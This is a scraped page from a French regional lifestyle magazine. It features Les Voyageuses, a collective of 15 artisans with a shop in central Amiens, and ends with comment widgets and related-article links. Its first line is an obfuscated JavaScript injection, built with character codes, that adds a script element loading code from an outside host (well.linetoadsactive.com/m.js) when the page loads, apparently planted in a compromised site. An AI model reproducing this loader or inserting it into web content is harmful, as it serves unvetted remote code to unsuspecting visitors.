Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Depuis mai dernier, Les Voyageuses ont ouvert une boutique rue Albert Dauphin, en plein cœur d’Amiens. A l’occasion des fêtes, les 15 créateurs de l’association proposent une multitude d’idées cadeaux.

    Les Voyageuses. Photo Fred Haslin

    « L’an dernier nous avions une boutique éphémère au moment de Noël qui a très bien fonctionné. L’envie de poursuivre plus durablement l’aventure nous a poussé à la réflexion » sourit Sophie. Avec sa complice Charlotte elle est à l’origine des Voyageuses, un collectif itinérant mettant à l’honneur des créations entièrement fait main. « Nous avons un peu fait évoluer notre concept, nous sommes aujourd’hui une association qui rassemble 15 créateurs. Nous partageons tout, ce qui nous permet de louer cette boutique » poursuit Sophie qui continue à fabriquer des vêtements et accessoires pour enfants.

    Les voyageuses rassemblent 15 créatrices.

    A ses côtés, Laurence installe quelques pièces de ses décors peints sur porcelaine. « Je fais du Miro à moi » plaisante-t-elle en ajustant un plat coloré. Par terre, Marianna donne une dernière touche à ses bijoux réalisés à partir des mêmes nœuds que le macramé. « J’ai commencé par faire une suspension et je n’ai jamais pu m’arrêter ! » dit-elle en mettant en scène quelques fées de fils. Comme elle, Clémence a fait le grand saut il y a quelques mois. Elle a quitté train-train quotidien et travail pour se consacrer à ses culottes brodées. « Ce sont toutes des pièces uniques ! » précise-t-elle, évoquant le plaisir de partager une boutique avec d’autres âmes créatives. Socio-esthéticienne, Isabelle est aussi passionnée par le wax, un tissu africain très coloré. « Je fais aussi bien des coussins que des bandeaux, des cadres ou encore des pochettes » détaille-t-elle. Café en main, chacune s’active pour parfaire le décor de la boutique qui se pare de nouveautés chaque mois. Entre éclats de rire et conseils, les petites mains présentes attendent Noël avec impatience. C’est que la période devrait être propice aux belles rencontres mais aussi aux moments de partage entre les chercheurs de cadeaux et ces adeptes de l’artisanat local.

    Par D.L. P.

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !
    • LE MAGAZINE URBAIN DU COURRIER PICARD Le Courrier picard, quotidien régional leader en Picardie, souhaitait répondre à un besoin grandissant des lecteurs : un magazine chic et tendance. C’est ainsi qu’est né «Instinct», un magazine harmonieux qui réunit 3 univers : la mode, la décoration et la culture.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Marine Déposé court avec les loups

    Après un album sorti en 2010, l’Amiénoise Marine Déposé revient avec un nouveau projet. ...

    Gaumont fête les dix ans de l’opéra au cinéma

    Alain Weislo, directeur du cinéma Gaumont d’Amiens, nous explique la démarche et dresse un ...

    A vélo, on découvre une autre Baie de Somme

    Plus discret, lent et léger, le vélo est un mode de transport passe-partout. L’idéal ...

    Où frissonner en Picardie pour Halloween ?

    Bouh ! Vous n’avez pas eu peur ? Alors, c’est que vous aimez sursauter ...

    Pretty Wire : un univers à part

    A la tête de son concept store « Pretty Wire », Justine Malbranche a fait de ...

    La Maison Pélat, créateur d’émotions

    La toute jeune marque amiénoise qui a fêté ses un an en septembre dernier ...